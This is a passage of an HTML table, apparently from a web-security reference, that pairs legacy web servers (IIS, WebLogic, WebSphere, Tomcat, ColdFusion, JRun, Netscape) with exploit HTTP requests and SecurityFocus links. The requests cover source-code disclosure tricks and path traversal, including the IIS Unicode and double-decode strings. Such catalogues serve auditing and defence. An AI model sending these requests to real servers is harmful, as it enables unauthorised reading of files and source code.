</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Tomcat %70 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.js%70 HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file%252ejsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2527" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2527</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic Case Sensitive File Extension </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.JSP HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jsP HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.Jsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1328" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1328</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic 5.1 %70 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.js%70 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2527" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2527</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic FileServlet </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /ConsoleHelp/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1518" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1518</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /file/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1378" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1378</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /*.shtml/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /*.shtml/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1517" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1517</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>IBM WebSphere Case Sensitive File Extension </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.JSP HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jsP HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.Jsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1328" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1328</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>IBM WebSphere /servlet/file/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /servlet/file/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1500" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1500</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 4.0 + FAT Filesystem </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.%E2%73%70 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2909" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2909</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 4.0 Alternative Data Stream </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file::$DATA HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/149" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/149</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS +.htr </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.asp+.htr HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1488" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1488</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Translate: f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.asp HTTP/1.0 Translate: f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1578" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1578</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 3.0 %2e </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%2easp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1814" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1814</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 2.0/3.0 Append "." </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.asp. HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.pl HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.asp%2e HTTP/1.0</p>
|
||||
<p class=doctext>4. GET /file.pl%2e HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2074" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2074</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle /_pages/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /_pages/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Sun Java Web Server .jhtml </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.jhtml. HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jhtml\HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1891" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1891</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>File Disclosure</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> <span
|
||||
class=docemphasis1>Vulnerable Application</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion Server exprcalc.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/expeval/ExprCalc.cfm?OpenFile Path=c:\file HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion openfile.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/expeval/openfile.cfm ?????????? HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion sourcewindow.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=../../file
|
||||
HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun /servlet/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /servlet/ssiservlet/../../file HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /servlet/com.livesoftware.jrun
|
||||
plugins.ssi.SSIFilter/../../file HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1833" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1833</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + PHP.EXE for Win32 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /php/php.exe?c:\file HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3786" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3786</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + PHP3 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.php3.%5c../..%5c<span class=docemphasis1><relative
|
||||
path to file</span>> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2060" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2060</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Unicode </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /scripts/..%c1%1c../<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /scripts/..%c0%9v../<span class=docemphasis1><</span>
|
||||
<span class=docemphasis1>relative path to file></span> HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /scripts/..%c0%af../<span class=docemphasis1><</span>
|
||||
<span class=docemphasis1>relative path to file></span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1806" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1806</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Double Decode </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /scripts/..%255c..%255c<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2708" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2708</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS %20.htr </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%20("%20" repeated 230 times).htr HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1191" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1191</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS idq.dll </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /query.idq?CiTemplate=<span class=docemphasis1><relative
|
||||
path to file> HTTP/1.0</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/968" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/968</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS showcode.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/167" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/167</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS codebrws.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /iissamples/exair/howitworks/ codebrws.asp?source=<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/167" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/167</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS viewcode.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /Sites/Knowledge/Membership/
|
||||
Inspired/ViewCode.asp?source=<span class=docemphasis1><relative path to
|
||||
file></span> HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /Sites/Knowledge/Membership/ <span
|
||||
class=docemphasis1>Inspiredtutorial</span>/ViewCode.asp?source=<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://support.microsoft.com/directory/article.asp?id=kb;en-us;q231656&"
|
||||
target="_blank"><span style='color:#003399'>http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q231656&</span></a>;
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>3. GET /Sites/Samples/Knowledge/
|
||||
Membership/Inspired/ViewCode.asp? source=<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server %20 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%20 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/273" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/273</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server /publisher </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /publisher HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2416" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2416</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server Win32 8.3 filename </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>Normal Request:</p>
|
||||
<p class=doctext>GET /directory/ HTTP/1.0</p>
|
||||
<p class=doctext>Exploitative Request:</p>
|
||||
<p class=doctext>GET /direct~1/ HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/584" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/584</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
